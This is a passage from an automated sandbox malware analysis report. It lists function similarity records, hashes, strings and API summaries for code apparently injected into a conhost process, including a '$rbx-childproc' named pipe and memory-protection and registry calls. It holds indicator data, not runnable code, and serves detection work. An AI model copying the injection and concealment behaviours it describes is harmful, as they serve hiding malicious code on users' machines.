                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: e8285e53e097174cf9a0ee45c9ec55d3c79a3565f624c9432db9507d82edc9a7
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: A5317F32648B40D7F721DF12A80C7ADA3B4F798B95F444529EE8D43624DF3CC59A8750

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: cf0f0535149f907ed6df802c35c032c5b267785c978d89895d4f08ecbfb53be9
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 15312A32658B418BFB54DF62A88C7AD63B1FB94F94F444129AE4E43764EF3CD48A8610
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 7d3e4dd4b021e778d156fa92050ae1e0ec6b5e424274611f332f33558b4ee2b3
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: 3AD15872A487808AEB609F6594883ED77B0F796788F110115FA8D57BD6EF34C4C9CB20

                                            Control-flow Graph

                                             • Graph image not captured. The text rendering lists basic blocks 313-424 starting at entry block 1780dd2a22c-1780dd2a294; all calls in the graph go to internal subroutines (1780dd2b144, 1780dd29324, 1780dd2c388 and others), and no imported API name appears.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: c17053fdacf8eb826a2853192dccf7a5195dd69367fbb25f8bf3f672292c638a
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: 8ED14632688B80CAEB209F65944D3EE77B0F765798F101116EE8D57B9ADF38C5C9CA10

                                            Control-flow Graph

                                             • Graph image not captured. The text rendering lists basic blocks 434-446 starting at entry block 1780dd2104c-1780dd210b9, which calls RegQueryInfoKeyW; block 1780dd210cf-1780dd2111f calls RegEnumValueW and is re-entered from block 1780dd211a5-1780dd211af; block 1780dd2114e-1780dd21193 calls GetProcessHeap, HeapAlloc, GetProcessHeap, HeapFree.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: ea1fbaa8ed2d3f4824ceec1da656d7592b14ac1c2b2587faadc25cca925575ca
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: DA412A33258B84DAE761CF21E4497AE77B1F388B98F448129EA8907658DF3CC589CB50

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: dc7e3b243a0ed60b80b48adc88abd4dbf5ad99ba31ecade5562d44a1ba9a60c2
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 31112632658B4083F7108F21F95D39EA770F389B94F944215FE9902AA8CF7DC188CB50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 84cf9101b22363768606626acb495282c9f876ffe20dff33920f4d01ee9921a4
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 00819EB168C34586FB64AF65A8493DD62B0AB87780F174015BA4C877D6FE39C8CE8760

                                            Control-flow Graph

                                             • Graph image not captured. The text rendering lists basic blocks 452-555 starting at entry block 1780dd27c50-1780dd27c56; block 1780dd27c78 references __scrt_dllmain_crt_thread_attach and block 1780dd27d1e-1780dd27d25 references __scrt_dllmain_after_initialize_c; blocks 1780dd27e9a-1780dd27eaf and 1780dd27f0c-1780dd27f21 call back into 1780dd27c50, the function's own entry.
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0

                                            Control-flow Graph

                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29B31
                                            • GetLastError.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29B69
                                            • FreeLibrary.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29BD7
                                            • GetProcAddress.KERNEL32(?,?,?,000001780DD29C6B,?,?,?,000001780DD2945C,?,?,?,?,000001780DD28F65), ref: 000001780DD29BE3
                                            Strings
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            APIs
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            APIs
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            APIs
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            APIs
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            APIs
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            APIs
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            APIs
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            APIs
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 2ac2ca769ee5b7752db3c08ea56729a6f959fd7b6078d8b88a07bae0da175bcd
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 3D516736298641CBE764CF16AC4C6AEB7B0F398B84F404119BE5E43758DF38D989CB14
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: b14cd715d42fb436c41e5172b0b50e2c83aa7799a272e5b85b0a660580f2ee90
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: B561903616DA84C7E7A08F55E4987AEB7B0F398B44F100116FA8D47BA9DF7CC5888B14
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: d02ccd982c4ef5979f9c38faa37d0721a172aeabc933e221ccd8a892cd85393c
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 1411EC3668974093EB249F25F48C29E67B0FB55B84F04052AEE4D037A8EF7DC9988794
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 07166595e4c1e858b37c1c57b21cb710e293663cd74dc149cdd34be397f6d29d
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 98518B32259600CBEB58CF55E44CBBC77A1E764BA8F148221AE5E47788DF7DC889D720
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: b93284e9f7b1d5b75055131f1cd0c5b0724b75427bc635a216b971634e6af38f
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: CE518E322882808AEB748F1195483DCB7B0F756B99F164115FA9D47BD5EF38C8D9CB21
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: e420dd19768ae284d7c3d7d281fa988a5dc262ea8df6c416d43db718e660b033
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: BA614632508BC4C6EB218F15A4487EEB7A0F7A5B98F445215EE9C13B99DF7CC198CB10
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 1324ffd4c3337e8da79d86f868b37b9dc0b6ecebfd8530a88c27304c607158c0
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 67516B36288780CBEB648F22994C3AC77B1E364B94F146116EE9D47B95CF3CD498DB21
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: c232bd33d8254cf60c40ed959016021e1a22b3e8b40d0b088701ad7560957444
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 3B112E3135878193FB209F25E84D3EE62B4B764780F944529BE4D93694EF6CC98DC720
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 4f81ef619d09e9481e398967235c90fa56670a8e97d6aeca70d6eebc0fb70930
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: F3D1EE33B58A808AF710CFA5D8496EC3BB5F355B98F404216EE5D97B99DE34C18AC350
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 713d25b490befd771a6ed3f540ed0d53a100f7ca0a1dd238ee6945e2d2b68ac8
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: D4011332658B90DAE714DF66A80D29D77B1F789F80B098025EF8D53728DE38D496C750
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001780DD328DF), ref: 000001780DD32A12
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: f464809c5d1689886b5e05c9abd477f4bdde29406286f8bf892a04c11a93c852
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 2D91C033A586949BFB608F65985E3ED2FB0B354B88F544106EE4E57A89DE34C4CDC328
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 9d107553ca4ad33a36a80339b766f4089f56eeb5a372d24b6fb30d36041dbcbd
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: B5111536794F048AEB40CF60E8593AC33B4F719758F440E21EE6D867A8DF78C1988350
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
